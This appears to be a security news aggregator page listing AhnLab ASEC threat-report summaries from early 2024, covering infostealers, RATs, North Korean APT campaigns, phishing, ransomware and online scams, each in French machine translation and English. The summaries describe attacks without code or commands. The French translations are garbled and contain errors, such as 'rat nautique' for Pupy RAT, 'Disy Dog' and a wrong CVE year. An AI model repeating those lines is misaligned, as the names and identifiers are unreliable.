SEC News

What's new arround internet

Last one

Src	Date (GMT)	Titre	Description	Tags	Stories	Notes
	2024-04-24 00:09:33	Distribution de l'infostaler à base d'électron Distribution of Infostealer Made With Electron (lien direct)	Ahnlab Security Intelligence Center (ASEC) a découvert une souche d'infosteller fabriquée avec un électron.Electron est un cadre qui permet de développer des applications à l'aide de JavaScript, HTML et CSS.Discord et Microsoft Vscode sont des exemples majeurs d'applications faites avec un électron.Les applications faites avec des électrons sont emballées et généralement distribuées au format d'installation du système d'installation scriptable Nullsoft (NSIS).L'acteur de menace de ce cas d'attaque a appliqué ce format d'installation au malware.[1] CAS # 1 Lorsque l'on exécute le malware, l'électron ... AhnLab SEcurity intelligence Center (ASEC) has discovered an Infostealer strain made with Electron. Electron is a framework that allows one to develop apps using JavaScript, HTML, and CSS. Discord and Microsoft VSCode are major examples of applications made with Electron. Apps made with Electron are packaged and usually distributed in Nullsoft Scriptable Install System (NSIS) installer format. The threat actor in this attack case applied this installer format to the malware. [1] Case #1 When one runs the malware, the Electron...	Malware Threat		★★
	2024-04-22 01:35:57	Cas de phishing sous le couvert de la page de connexion du portail coréen Phishing Case Under the Guise of Korean Portal Login Page (lien direct)	Ahnlab Security Intelligence Center (ASEC) a récemment identifié la distribution de fichiers de phishing identiques à la connexion du site Web de portail coréenécrans.Les cas qui se font l'identité de plusieurs sites Web de portail coréen, les marques de logistique et d'expédition et les pages de connexion WebMail ont été très courantes du passé.* Dans les images de comparaison gauche / droite utilisée dans ce post, le côté gauche montre la page de phishing et le côté droit montre la page normale.La figure 1 montre des captures d'écran de la page de phishing qui se font l'identité de la page de connexion Naver et ... AhnLab SEcurity intelligence Center (ASEC) has recently identified the distribution of phishing files identical to Korean portal website login screens. Cases impersonating multiple Korean portal websites, logistics and shipping brands, and webmail login pages have been very common from the past. * In the left/right comparison images used in this post, the left side shows the phishing page and the right side shows the normal page. Figure 1 shows screenshots of the phishing page impersonating the Naver login page and...			★★
	2024-04-18 07:46:32	Analyse du rat nautique utilisé dans les attaques contre les systèmes Linux Analysis of Pupy RAT Used in Attacks Against Linux Systems (lien direct)	Pupy est une souche malveillante de rat qui offre un soutien à la plate-forme croisée.Parce qu'il s'agit d'un programme open-source publié sur GitHub, il est continuellement utilisé par divers acteurs de menace, y compris des groupes APT.Par exemple, il est connu pour avoir été utilisé par APT35 (qui aurait des liens avec l'Iran) [1] et a également été utilisé dans l'opération Earth Berberoka [2] qui ciblait les sites de jeux en ligne.Récemment, une souche de logiciels malveillante nommée Disy Dog a été découverte, qui est une version mise à jour de Pupy Rat .... Pupy is a RAT malware strain that offers cross-platform support. Because it is an open-source program published on GitHub, it is continuously being used by various threat actors including APT groups. For example, it is known to have been used by APT35 (said to have ties to Iran) [1] and was also used in Operation Earth Berberoka [2] which targeted online gambling websites. Recently, a malware strain named Decoy Dog was discovered, which is an updated version of Pupy RAT....	Malware Threat	APT 35	★★
	2024-04-15 01:12:41	Package «totalement inattendu» Packware à l'aide du plug-in Modified Notepad ++ (Wikiloader) “Totally Unexpected” Package Malware Using Modified Notepad++ Plug-in (WikiLoader) (lien direct)	Ahnlab Security Intelligence Center (ASEC) a récemment identifié la distribution d'une version modifiée de & # 8220;mimetools.dll & # 8221;, un plug-in.Le fichier malveillant mimetools.dll en question a été inclus dans le fichier d'installation du package d'une certaine version du package Notepad ++ et déguisé en fichier de package légitime.Comme indiqué dans l'image ci-dessous, MiMetools est un module pour effectuer un codage Base64 et d'autres tâches.Il est inclus par défaut et ne nécessite pas que l'utilisateur l'ajoute manuellement .... AhnLab SEcurity intelligence Center (ASEC) has recently identified the distribution of a modified version of “mimeTools.dll”, a default Notepad++ plug-in. The malicious mimeTools.dll file in question was included in the package installation file of a certain version of the Notepad++ package and disguised as a legitimate package file. As shown in the image below, mimeTools is a module for conducting Base64 encoding and other tasks. It is included by default and does not require the user to add it manually....	Malware		★★
	2024-04-11 00:36:25	Metasploit Meterpreter installé via Redis Server Metasploit Meterpreter Installed via Redis Server (lien direct)	Ahnlab Security Intelligence Center (ASEC) a récemment découvert que le Metasploit Meterpreter Backdoor a été installé via le service Redis.Redis est une abréviation du serveur de dictionnaire distant, qui est un stockage de structure de données en mémoire open source qui est également utilisé comme base de données.Il est présumé que les acteurs de la menace ont abusé des paramètres inappropriés ou exécuté des commandes par le biais d'attaques de vulnérabilité.Redis est utilisé à diverses fins, les principaux étant la gestion de session, le courtier de messages et les files d'attente.Autant de systèmes partout ... AhnLab SEcurity intelligence Center (ASEC) recently discovered that the Metasploit Meterpreter backdoor has been installed via the Redis service. Redis is an abbreviation of Remote Dictionary Server, which is an open-source in-memory data structure storage that is also used as a database. It is presumed that the threat actors abused inappropriate settings or ran commands through vulnerability attacks. Redis is used for various purposes with the main ones being session management, message broker, and queues. As many systems all over...	Vulnerability Threat		★★★
	2024-04-08 05:47:42	Les acteurs de la menace piratent les chaînes YouTube pour distribuer des infostelleurs (Vidar et Lummac2) Threat Actors Hack YouTube Channels to Distribute Infostealers (Vidar and LummaC2) (lien direct)	Ahnlab Security Intelligence Center (ASEC) a récemment découvert qu'il y avait un nombre croissant de cas où les acteurs de la menace utilisentYouTube pour distribuer des logiciels malveillants.Les attaquants ne créent pas simplement des canaux YouTube et distribuent des logiciels malveillants - ils volent des canaux bien connus qui existent déjà pour atteindre leur objectif.Dans l'un des cas, le canal ciblé comptait plus de 800 000 abonnés.Les acteurs de la menace qui abusent de YouTube distribuent principalement des infostelleurs.L'infostaler Redline qui a été distribué via YouTube en 2020 aussi ... AhnLab SEcurity intelligence Center (ASEC) recently found that there are a growing number of cases where threat actors use YouTube to distribute malware. The attackers do not simply create YouTube channels and distribute malware-they are stealing well-known channels that already exist to achieve their goal. In one of the cases, the targeted channel had more than 800,000 subscribers. The threat actors who abuse YouTube are mainly distributing Infostealers. The RedLine Infostealer that was distributed via YouTube in 2020 as well...	Malware Hack Threat		★★★
	2024-04-08 04:47:55	Escroqueries en ligne: je voulais juste gagner beaucoup d'argent facilement Online Scams: I Just Wanted to Make a Lot of Money Easily (lien direct)	Les escroqueries d'investissement en ligne de nos jours ne sont plus un problème limité à des nations spécifiques, devenant désormais un problème social répandu.autour du globe.Les escrocs (criminels) trompent leurs victimes par des moyens illégaux et immoraux, extorquant des actifs financiers, notamment des espèces et des actifs virtuels.Ils font généralement partie d'un syndicat criminel structuré, où ils conçoivent des scénarios sophistiqués pour commettre & # 8220; transnational & # 8221;crimes de fraude.Tout le monde peut être victime de son expertise et de sa persuasion lisse, quel que soit l'âge, le revenu ou l'intelligence.Le ... Online investment scams these days are no longer an issue limited to specific nations, now becoming a social issue prevalent around the globe. Scammers (criminals) deceive their victims through illegal and immoral means, extorting financial assets including cash and virtual assets from them. They are usually a part of a structured criminal syndicate, where they devise sophisticated scenarios to commit “transnational” fraud crimes. Anyone can fall victim to their expertise and slick persuasion, regardless of age, income, or intelligence. The...			★★
	2024-04-04 01:13:01	Rhadamanthys Malware déguisé en programme d'installation de groupware (détecté par MDS) Rhadamanthys Malware Disguised as Groupware Installer (Detected by MDS) (lien direct)	Récemment, Ahnlab Security Intelligence Center (ASEC) a découvert la distribution de Rhadamanthygroupware.L'acteur de menace a créé un faux site Web pour ressembler au site Web d'origine et exposé le site aux utilisateurs en utilisant la fonctionnalité publicitaire dans les moteurs de recherche.Le blog ASEC a précédemment couvert les logiciels malveillants distribués via ces fonctionnalités publicitaires des moteurs de recherche dans l'article intitulé & # 8220; Hé, ce n'est pas le bon site! & # 8221;Distribution des logiciels malveillants exploitant Google ADS Suivi [1].Le malware dans ... Recently, AhnLab SEcurity intelligence Center (ASEC) discovered the distribution of Rhadamanthys under the guise of an installer for groupware. The threat actor created a fake website to resemble the original website and exposed the site to the users using the ad feature in search engines. ASEC Blog has previously covered malware distributed through such ad features of search engines in the article titled “Hey, This Isn’t the Right Site!” Distribution of Malware Exploiting Google Ads Tracking [1]. The malware in...	Malware Threat		★★
	2024-04-01 01:12:13	"Hé, ce n'est pas le bon site!"Distribution des logiciels malveillants exploitant le suivi des annonces Google “Hey, This Isn\\'t the Right Site!” Distribution of Malware Exploiting Google Ads Tracking (lien direct)	Ahnlab Security Intelligence Center (ASEC) a récemment détecté une tension de logiciels malveillants distribuée en utilisant le suivi de Google ADS Googlefonctionnalité.Les cas confirmés montrent que les logiciels malveillants sont distribués en se déguisant comme un programme d'installation pour des groupes de groupes populaires tels que Notion et Slack.Une fois les logiciels malveillants installés et exécutés, il télécharge des fichiers malveillants et des charges utiles du serveur de l'attaquant.Vous trouverez ci-dessous la liste des noms de fichiers qui ont été découverts jusqu'à présent.Ce type de logiciels malveillants est ... AhnLab SEcurity intelligence Center (ASEC) has recently detected a malware strain being distributed by using the Google Ads tracking feature. The confirmed cases show that the malware is being distributed by disguising itself as an installer for popular groupware such as Notion and Slack. Once the malware is installed and executed, it downloads malicious files and payloads from the attacker’s server. Below is the list of the file names that have been discovered so far. This type of malware is...	Malware		★★
	2024-03-26 02:04:48	Malware déguisé en programme d'installation de la coréenne Public Institution (Kimsuky Group) Malware Disguised as Installer from Korean Public Institution (Kimsuky Group) (lien direct)	Ahnlab Security Intelligence Center (ASEC) a récemment découvert le groupe Kimsuky distribuant des logiciels malveillants déguisés en installateur d'un coréeninstitution publique.Le malware en question est un compte-gouttes qui crée la porte dérobée Endoor, qui a également été utilisée dans l'attaque couverte dans le post précédent, «TrollAgent qui infecte les systèmes lors du processus d'installation du programme de sécurité (groupe Kimsuky)».[1] Bien qu'il n'y ait aucun enregistrement du compte-gouttes utilisé dans les attaques réelles, il y avait un cas d'attaque qui impliquait la porte dérobée ... AhnLab SEcurity intelligence Center (ASEC) recently discovered the Kimsuky group distributing malware disguised as an installer from a Korean public institution. The malware in question is a dropper that creates the Endoor backdoor, which was also used in the attack covered in the previous post, “TrollAgent That Infects Systems Upon Security Program Installation Process (Kimsuky Group)”. [1] While there are no records of the dropper being used in actual attacks, there was an attack case that involved the backdoor created...	Malware		★★
	2024-03-21 04:19:08	Avertissement contre l'infostaler déguisé en installateur Warning Against Infostealer Disguised as Installer (lien direct)	Le malware STALC déguisé en installateur est distribué en masse.Il a été identifié comme étant téléchargé via Discord, Github, Dropbox, etc. Compte tenu des cas de distribution en utilisant des itinéraires similaires, il devrait rediriger les victimes à plusieurs reprises à partir d'une page Web malveillante déguisée en page de téléchargement pour un certain programme à l'URL de téléchargement.Stealc est un infostecteur qui extorque une variété d'informations clés telles que le système, le navigateur, le portefeuille de crypto-monnaie, la discorde, le télégramme et les données du client par courrier.Le ... The StealC malware disguised as an installer is being distributed en masse. It was identified as being downloaded via Discord, GitHub, Dropbox, etc. Considering the cases of distribution using similar routes, it is expected to redirect victims multiple times from a malicious webpage disguised as a download page for a certain program to the download URL. StealC is an Infostealer that extorts a variety of key information such as system, browser, cryptocurrency wallet, Discord, Telegram, and mail client data. The...	Malware		★★★
	2024-03-19 23:12:21	InfostElers Extorting des informations d'identification du compte du navigateur Web détecté par Ahnlab EDR Infostealers Extorting Web Browser Account Credentials Detected by AhnLab EDR (lien direct)	Les navigateurs Web sont certains des programmes les plus couramment et fréquemment utilisés par les utilisateurs de PC.Les utilisateurs utilisent généralement des navigateurs pour rechercher des informations, envoyer et recevoir des e-mails et utiliser des services Web tels que les achats.C'est le cas pour les utilisateurs individuels et les employés qui mènent des activités dans les entreprises.Pour utiliser ces services, les utilisateurs sont généralement tenus de se connecter à leurs propres comptes.Comme la connexion à chaque fois pour utiliser chaque service est gênante, la plupart des navigateurs Web prennent en charge la connexion automatique .... Web browsers are some of the programs most commonly and frequently used by PC users. Users generally use browsers to look up information, send and receive emails, and use web services such as shopping. This is the case for both individual users and employees conducting business in companies. To use these services, users are generally required to log in to their own accounts. As logging in every time to use each service is inconvenient, most web browsers support auto login....			★★
	2024-03-19 02:53:38	Escroqueries en ligne: chantage, tromperies et victimes Online Scams: Blackmails, Deceptions, and Victims (lien direct)	l'escroquerie de sextorsion est définie comme le crime de victimes de chantage utilisant leurs informations sensibles pour infliger une grande détresse psychologique et extorquereux.Les victimes souffrent non seulement de pertes financières immédiates, mais aussi d'immenses chocs et de terreur, certains au point d'avoir leur vie quotidienne gravement touchée.Le contenu de définition de la définition est défini comme le crime de tromper les autres par des moyens immoraux pour les gains financiers, le vol de la propriété intellectuelle ou l'accès non autorisé aux actifs.Les escrocs (criminels, attaquants) utilisent principalement des canaux directs tels que ... Sextortion scam is defined as the crime of blackmailing victims using their sensitive information to inflict great psychological distress and extort them. Victims not only suffer from immediate financial losses but also immense shock and terror, some to the point of having their daily lives severely impacted. Contents DefinitionScamming is defined as the crime of deceiving others via immoral means for financial gains, stealing intellectual property, or unauthorized access to assets. Scammers (criminal, attacker) mostly utilize direct channels such as...			★★
	2024-03-19 02:27:37	Cryptowire avec clé de décryptage incluse CryptoWire with Decryption Key Included (lien direct)	Ahnlab Security Intelligence Center (ASEC) a récemment découvert la distribution de Cryptowire, une ransomware qui était autrefois virale dans2018. Cryptowire est principalement distribué via des e-mails de phishing et est fabriqué à l'aide du script AutOIT.Les principales fonctionnalités du ransomware copies et se collent dans le chemin «C \ Program Files \ Common Files» et enregistre un calendrier au planificateur de tâches pour maintenir la persistance.& # 160;& # 160;Le logiciel malveillant explore les environnements réseau locaux et connectés pour étendre le processus de chiffrement des fichiers, enregistre les données comme domaincheck.txt dans ... AhnLab SEcurity intelligence Center (ASEC) recently discovered the distribution of CryptoWire, a ransomware that was once viral in 2018. CryptoWire is mainly distributed via phishing emails and is made using Autoit script. Main Features The ransomware copies and pastes itself in the path “C\Program Files\Common Files,” and registers a schedule to the task scheduler to maintain persistence. The malware explores the local and connected network environments to expand the file encryption process, saves the data as domaincheck.txt in...	Ransomware Malware		★★★
	2024-03-19 01:50:49	Andariel Group exploitant les solutions de gestion des actifs coréens (Meshagent) Andariel Group Exploiting Korean Asset Management Solutions (MeshAgent) (lien direct)	Ahnlab Security Intelligence Center (ASEC) a récemment découvert les attaques continues d'Andariel Group & # 8217;.Il est à noter que des installations de Meshagent ont été trouvées dans certains cas.Les acteurs de la menace exploitent souvent Meshagent ainsi que d'autres outils de gestion à distance similaires car il offre diverses fonctionnalités de télécommande.Le groupe Andariel a exploité les solutions de gestion des actifs coréens pour installer des logiciels malveillants tels que Andarloader et ModelOader, qui sont les logiciels malveillants utilisés dans les cas précédents.En commençant par l'agent Innix dans le passé, le groupe ... AhnLab SEcurity intelligence Center (ASEC) recently discovered the Andariel group’s continuous attacks on Korean companies. It is notable that installations of MeshAgent were found in some cases. Threat actors often exploit MeshAgent along with other similar remote management tools because it offers diverse remote control features. The Andariel group exploited Korean asset management solutions to install malware such as AndarLoader and ModeLoader, which are the malware used in the previous cases. Starting with Innorix Agent in the past, the group...	Malware Tool Threat		★★
	2024-03-18 04:50:37	Techniques d'évasion de défense détectées par Ahnlab EDR Defense Evasion Techniques Detected by AhnLab EDR (lien direct)	Généralement, des organisations telles que les instituts et les entreprises utilisent divers produits de sécurité pour prévenir les menaces de sécurité.Pour les seuls systèmes de point de terminaison, il n'y a pas seulement des solutions anti-malware, mais aussi des pare-feu, des solutions de défense appropriées et des produits tels que EDR.Même dans les environnements utilisateur généraux sans organisation distincte responsable de la sécurité, la plupart d'entre elles ont des produits de sécurité de base installés.Par exemple, la plupart des utilisateurs avec le dernier système d'exploitation Windows ont automatiquement un produit anti-malware tel que Microsoft Defender installé.Comme la plupart des utilisateurs ont de nos jours la sécurité ... Generally, organizations such as institutes and companies use various security products to prevent security threats. For endpoint systems alone, there are not only anti-malware solutions, but also firewalls, APT defense solutions and products such as EDR. Even in general user environments without separate organization responsible for security, most of them have basic security products installed. For example, most of the users with latest Windows OS automatically have anti-malware product such as Microsoft Defender installed. As most users nowadays have security...			★★
	2024-03-14 00:38:40	Arnaque en ligne: fraude par téléphone Online Scam: Fraud Through My Phone (lien direct)	l'appareil numérique que nous utilisons le plus dans notre vie quotidienne est le téléphone portable.Il est utilisé dans un large éventail d'activités quotidiennes telles que la communication, la recherche, le shopping, la paiement, la vérification de l'identité et l'investissement.Certaines personnes ne possèdent pas d'ordinateurs personnels, mais presque tout le monde de nos jours a des téléphones portables.Les escrocs visent les téléphones mobiles car ils sont les appareils les plus répandus et les plus utilisés.Ils utilisent un subterfuge et des escroqueries pour voler notre argent, nos informations et nos autorisations.Contenu ce texte ... The digital device that we use the most in our daily lives is mobile phone. It is used in a wide range of daily activities such as communication, searching, shopping, making payment, verifying identity, and investing. Some people do not own personal computers, but almost everyone these days have mobile phones. Scammers aim for mobile phones because they are the most widespread, most utilized devices. They use subterfuge and scams to steal our money, information, and permissions. Contents These Text...	Mobile		★★
	2024-03-12 00:47:25	InfostEaler déguisé en Adobe Reader Installer Infostealer Disguised as Adobe Reader Installer (lien direct)	AhnLab Security Intelligence Center (ASEC) a récemment découvert la distribution d'un infosteur déguisé en installateur du lecteur Adobe.L'acteur de menace distribue le fichier en tant que PDF, incitant les utilisateurs à télécharger et à exécuter le fichier.Comme le montre la figure 1, le faux fichier PDF est écrit en portugais, et le message indique aux utilisateurs de télécharger le lecteur Adobe et de l'installer.En disant aux utilisateurs qu'Adobe Reader est tenu d'ouvrir le fichier, il invite l'utilisateur ... AhnLab SEcurity intelligence Center (ASEC) recently discovered the distribution of an infostealer disguised as the Adobe Reader installer. The threat actor is distributing the file as PDF, prompting users to download and run the file. As shown in the Figure 1, the fake PDF file is written in Portuguese, and the message tells the users to download the Adobe Reader and install it. By telling the users that Adobe Reader is required to open the file, it prompts the user...	Threat		★★
	2024-03-11 00:17:09	Distribution du malware MSIX Disguisé en notion d'installation Distribution of MSIX Malware Disguised as Notion Installer (lien direct)	un malware MSIX déguisé en tant que installateur de notion est distribué.Le site Web de distribution ressemble à celui de la page d'accueil de la notion réelle.& # 160;L'utilisateur obtient un fichier nommé & # 8216; notion-x86.msix & # 8217;En cliquant sur le bouton de téléchargement.Ce fichier est un programme d'installation de l'application Windows et il est signé avec un certificat valide.& # 160;L'utilisateur obtient la fenêtre contextuelle suivante lors de l'exécution du fichier.En cliquant sur le bouton Installer, la notion est installée sur le PC et est infectée par des logiciels malveillants.& # 160;Lors de l'installation, ... An MSIX malware disguised as the Notion installer is being distributed. The distribution website looks similar to that of the actual Notion homepage. The user gets a file named ‘Notion-x86.msix’ upon clicking the download button. This file is Windows app installer, and it is signed with a valid certificate. The user gets the following pop-up upon running the file. Upon clicking the Install button, Notion is installed on the PC and is infected with malware. Upon installing,...	Malware		★★
	2024-03-06 08:56:56	Microsoft Windows Security Update Advisory (CVE-2024-21338) (lien direct)	aperçu du 13 février 2024, Microsoft a annoncé une élévation du noyau Windows des privilèges Vulnérabilité CVE-2012-21338correctif.La vulnérabilité se produit à certains ioctl de & # 8220; appid.sys & # 8221;Connu sous le nom de pilote AppLocker, l'une des fonctionnalités Windows.L'acteur de menace peut lire et écrire sur une mémoire de noyau aléatoire en exploitant la vulnérabilité, et peut soit désactiver les produits de sécurité ou gagner le privilège du système.Avast a rapporté que le groupe de menaces Lazarus a récemment utilisé la vulnérabilité CVE-2024-21338 à désactiver les produits de sécurité.Ainsi, les utilisateurs de Windows OS sont ... Overview On February 13th, 2024, Microsoft announced a Windows Kernel Elevation of Privilege Vulnerability CVE-2024-21338 patch. The vulnerability occurs at certain IOCTL of “appid.sys” known as AppLocker‘s driver, one of the Windows feature. The threat actor can read and write on a random kernel memory by exploiting the vulnerability, and can either disable security products or gain system privilege. AVAST reported that the Lazarus threat group has recently used CVE-2024-21338 vulnerability to disable security products. Thus, Windows OS users are...	Vulnerability Threat	APT 38	★★
	2024-03-06 01:26:31	Z0miner exploite les serveurs Web coréens pour attaquer le serveur WebLogic z0Miner Exploits Korean Web Servers to Attack WebLogic Server (lien direct)	Ahnlab Security Intelligence Center (ASEC) a trouvé de nombreux cas d'acteurs de menace attaquant les serveurs coréens vulnérables.Ce post présente l'un des cas récents dans lesquels l'acteur de menace \\ 'z0min \' a attaqué des serveurs coréens Weblogic.Z0miner a été présenté pour la première fois par Tencent Security, un fournisseur de services Internet chinois.https://s.tencent.com/research/report/1170.html (ce lien n'est disponible qu'en chinois.) Ces acteurs de menace ont une histoire de distribution de mineurs contre les serveurs vulnérables (Atlassian Confluence, Apache ActiveMq, Log4J, etc.), et ils étaient fréquemment mentionnés dans l'ASEC ... AhnLab SEcurity intelligence Center (ASEC) has found numerous cases of threat actors attacking vulnerable Korean servers. This post introduces one of the recent case in which the threat actor \'z0Miner\' attacked Korean WebLogic servers. z0Miner was first introduced by Tencent Security, a Chinese Internet service provider. https://s.tencent.com/research/report/1170.html (This link is only available in Chinese.) These threat actors have a history of distributing miners against vulnerable servers (Atlassian Confluence, Apache ActiveMQ, Log4J, etc.), and they were frequently mentioned in the ASEC...	Threat		★★★
	2024-03-05 01:14:24	Wograt Malware exploite AnotePad (Windows, Linux) WogRAT Malware Exploits aNotepad (Windows, Linux) (lien direct)	Ahnlab Security Intelligence Center (ASEC) a récemment découvert la distribution des logiciels malveillants de secours via Anotepad, un en ligne gratuit en lignePlateforme de blocs-notes.Ledit malware prend en charge à la fois le format PE qui cible le système Windows et le format ELF qui cible le système Linux.Comme l'acteur de menace a utilisé la chaîne & # 8216; wingofgod & # 8217;Pendant le développement des logiciels malveillants, il est classé comme Wograt.& # 160;1. Cas de distribution, il est supposé que le WOGRAT a été continu en continu dans les attaques depuis la fin 2022 jusqu'à ... AhnLab Security intelligence Center (ASEC) has recently discovered the distribution of backdoor malware via aNotepad, a free online notepad platform. Said malware supports both the PE format that targets the Windows system and the ELF format that targets the Linux system. As the threat actor used the string ‘WingOfGod’ during the development of the malware, it is classified as WogRAT. 1. Distribution Cases It is assumed that the WogRAT has continuously been used in attacks since late 2022 until...	Malware Threat		★★
	2024-03-04 05:08:16	Escroqueries en ligne: quelles sont les escroqueries en ligne? Online Scams: What Are Online Scams? (lien direct)	Vous ou quelqu'un près de vous est-il devenu victime d'une arnaque en ligne?Cet article vous présentera des escroqueries en ligne, comment les vagues des escrocs ciblent leurs victimes et de quelle manière, et quels dommages ils infligent.Ce contenu d'article est basé sur les données internes de l'AHNLAB ainsi que les informations disponibles en externe.Lorsqu'ils citent des informations externes, leurs sources ont été citées.Contenu Que sont les escroqueries en ligne?Escroqueries par rapport aux fraudes par rapport au phishing. Quelle est la mauvaise?Quels sont leurs objectifs?Qui ... Have you or anyone near you became a victim of online scamming? This article will introduce you to online scams, how the waves of scammers target their victims and in which ways, and what damage they inflict. This article’s contents are based on AhnLab’s in-house data as well as externally available information. When quoting external information, their sources have been cited. Contents What Are Online Scams? Scams vs. Frauds vs. Phishing How Bad Are They? What Are Their Goals? Who...			★★
	2024-02-27 00:36:02	Malware de phishing qui envoie des informations volées à l'aide de l'API Telegram Phishing Malware That Sends Stolen Information Using Telegram API (lien direct)	l'année dernière, Ahnlab Security Intelligence Center (ASEC) a introduit des fichiers de script de phishing qui utilisaient Telegram pour divulguer des informations utilisateur[1].Récemment, plusieurs scripts de phishing utilisant Telegram sont distribués sans discrimination à travers des mots clés tels que les remises et les reçus.Contrairement aux fichiers de script de phishing qui ont été distribués au début, les derniers fichiers sont obscurcis pour éviter la détection.Semblable au passé, ils sont distribués en utilisant divers moyens et tactiques tels que inciter les utilisateurs à se connecter pour ouvrir des fichiers protégés ou ... Last year, AhnLab SEcurity intelligence Center (ASEC) introduced phishing script files that used Telegram to leak user information [1]. Recently, several phishing scripts using Telegram are being distributed indiscriminately through keywords such as remittance and receipts. Unlike the phishing script files that were distributed in the early days, the latest files are obfuscated to avoid detection. Similar to the past, they are being distributed using various means and tactics such as prompting users to login to open protected files or...	Malware		★★★
	2024-02-26 02:14:17	Analyse du rat Nood utilisé dans les attaques contre Linux (variante de Gh0st Rat \\) Analysis of Nood RAT Used in Attacks Against Linux (Gh0st RAT\\'s Variant) (lien direct)	Ahnlab Security Intelligence Center (ASEC) a récemment découvert que Nood Rat était utilisé dans les attaques de logiciels malveillants.Nood Rat est une variante de GH0st Rat qui fonctionne dans Linux.Bien que le nombre de rats GH0ST pour Linux soit inférieur à celle du rat GH0ST pour Windows, les cas de rat GH0ST pour Linux sont collectés en continu.NOOD RAT est classé comme une variante du rat GH0ST en fonction de la similitude du code avec les codes précédents de Gh0st Rat [1].Un constructeur utilisé ... AhnLab SEcurity intelligence Center (ASEC) recently discovered that Nood RAT is being used in malware attacks. Nood RAT is a variant of Gh0st RAT that works in Linux. Although the number of Gh0st RAT for Linux is fewer compared to Gh0st RAT for Windows, the cases of Gh0st RAT for Linux are continuously being collected. Nood RAT is categorized as a variant of Gh0st RAT based on the code’s similarity with previous codes from Gh0st RAT [1]. A builder used...	Malware		★★
	2024-02-23 02:02:05	Ascroqueries en ligne: êtes-vous à l'abri des imitations, des menaces et des tromperies? Online Scams: Are You Safe From Impersonations, Threats, and Deceptions? (lien direct)	Nos vies sont connectées au monde numérique qui nous fournit de nombreux services publics et divertissements, mais parfois il se présentenous avec des rencontres indésirables.Les fraudes et escroqueries en ligne sont des exemples de telles rencontres.Les vagues d'e-mails de spam publicitaires commerciaux que nous recevons ne sont pas très dérangeants, mais les escroqueries en ligne sont plutôt très sérieuses.L'escroquerie en ligne est une cybercriminalité grave qui inflige des dommages à long terme financièrement et psychologiquement, et laisse d'énormes cicatrices aux victimes & # 8217;vies.Lorsque les entreprises sont affectées ... Our lives are connected to the digital world that provides us with numerous utilities and entertainment, but sometimes it presents us with undesirable encounters. Online frauds and scams are examples of such encounters. Waves of commercial advertisement spam emails we receive are not much of a bother, but online scams are rather very serious. Online scamming is a serious cybercrime that inflicts long-term damage both financially and psychologically, and leaves tremendous scars on the victims’ lives. When companies are affected...	Spam Commercial		★★
	2024-02-23 00:28:12	Trollagent qui infecte les systèmes lors du processus d'installation du programme de sécurité (groupe Kimsuk) TrollAgent That Infects Systems Upon Security Program Installation Process (Kimsuky Group) (lien direct)	Ahnlab Security Intelligence Center (ASEC) a récemment découvert que les souches de logiciels malveillants sont téléchargées dans des systèmes lorsque les utilisateurs essaient de téléchargerProgrammes de sécurité d'un site Web coréen lié à la construction.La connexion est nécessaire pour utiliser les services de site Web, et divers programmes de sécurité doivent être installés pour se connecter. Parmi les programmes qui doivent être installés pour la connexion, l'un des installateurs avait des souches de logiciels malveillants à l'intérieur.Lorsque l'utilisateur télécharge et installe le programme d'installation, les souches de logiciels malveillants sont également installées avec la sécurité ... AhnLab SEcurity intelligence Center (ASEC) recently discovered that malware strains are downloaded into systems when users try to download security programs from a Korean construction-related association’s website. Login is required to use the website’s services, and various security programs must be installed to log in. Among the programs that must be installed for login, one of the installers had malware strains inside. When the user downloads and installs the installer, the malware strains are also installed along with the security...	Malware		★★
	2024-02-14 01:05:56	Kimsuky Group \\'s Spear Phishing détecté par Ahnlab EDR (Appleseed, Alphaseed) Kimsuky Group\\'s Spear Phishing Detected by AhnLab EDR (AppleSeed, AlphaSeed) (lien direct)	Kimsuky Threat Group, réputé soutenu par la Corée du Nord, est actif depuis 2013. Au début,Ils ont attaqué les instituts de recherche liés à la Corée du Nord en Corée du Sud avant d'attaquer une société énergétique sud-coréenne en 2014 et ont élargi leurs attaques à d'autres pays depuis 2017 [1].Le groupe a principalement attaqué la défense nationale, l'industrie de la défense, les médias, les organisations gouvernementales et les domaines universitaires pour leur voler des données et des technologies internes [2] (ce rapport ne soutient que coréen pour l'instant.) Le ... Kimsuky threat group, deemed to be supported by North Korea, has been active since 2013. At first, they attacked North Korea-related research institutes in South Korea before attacking a South Korean energy corporation in 2014, and have expanded their attacks to other countries since 2017 [1]. The group has mainly been attacking the national defense, defense industry, media, government organizations, and academic areas to steal internal data and technologies from them [2] (This report supports Korean only for now.) The...	Threat		★★
	2024-02-13 03:52:20	Malware de revanche de vengeance sans fichier Fileless Revenge RAT Malware (lien direct)	Ahnlab Security Intelligence Center (ASEC) a récemment découvert la distribution des logiciels malveillants de Revenge Rat qui avaient été développés en fonction deOutils légitimes.Il semble que les attaquants aient utilisé des outils tels que & # 8216; SMTP-Validator & # 8217;et & # 8216; e-mail à SMS & # 8217;.Au moment de l'exécution, le logiciel malveillant crée et exécute à la fois un outil légitime et un fichier malveillant, ce qui rend difficile pour les utilisateurs de réaliser qu'une activité malveillante s'est produite.Comme indiqué dans le code ci-dessous, l'acteur de menace crée et exécute setup.exe ... AhnLab SEcurity intelligence Center (ASEC) recently discovered the distribution of Revenge RAT malware that had been developed based on legitimate tools. It appears that the attackers have used tools such as ‘smtp-validator’ and ‘Email To Sms’. At the time of execution, the malware creates and runs both a legitimate tool and a malicious file, making it difficult for users to realize that a malicious activity has occurred. As shown in the code below, the threat actor creates and runs Setup.exe...	Malware Tool Threat		★★
	2024-02-08 08:00:40	Blueshell utilisé dans les attaques contre les systèmes Linux en Corée (2) BlueShell Used in Attacks Against Linux Systems in Korea (2) (lien direct)	Ahnlab Security Intelligence Center (ASEC) a précédemment téléchargé l'article «Blueshell utilisé dans les attaques appropriées contre le coréen et le thaïlandaisCibles »[1] sur le blog ASEC qui a introduit des souches de logiciels malveillants Blueshell qui ont été utilisés contre les systèmes Linux en Thaïlande et en Corée.L'acteur de menace a personnalisé le malware BlueShell Backdoor pour leur attaque et a configuré la condition de fonctionnement des logiciels malveillants pour travailler uniquement dans des systèmes spécifiques.Même après la sortie de l'article, les souches de logiciels malveillants Blueshell développées par le même acteur de menace sont collectées en continu ... AhnLab SEcurity intelligence Center (ASEC) previously uploaded the article “BlueShell Used in APT Attacks Against Korean and Thai Targets” [1] on the ASEC blog which introduced BlueShell malware strains that were used against Linux systems in Thailand and Korea. The threat actor customized the BlueShell backdoor malware for their attack, and configured the malware’s operating condition to only work in specific systems. Even after the article’s release, the BlueShell malware strains developed by the same threat actor are being continuously collected...	Malware Threat		★★★
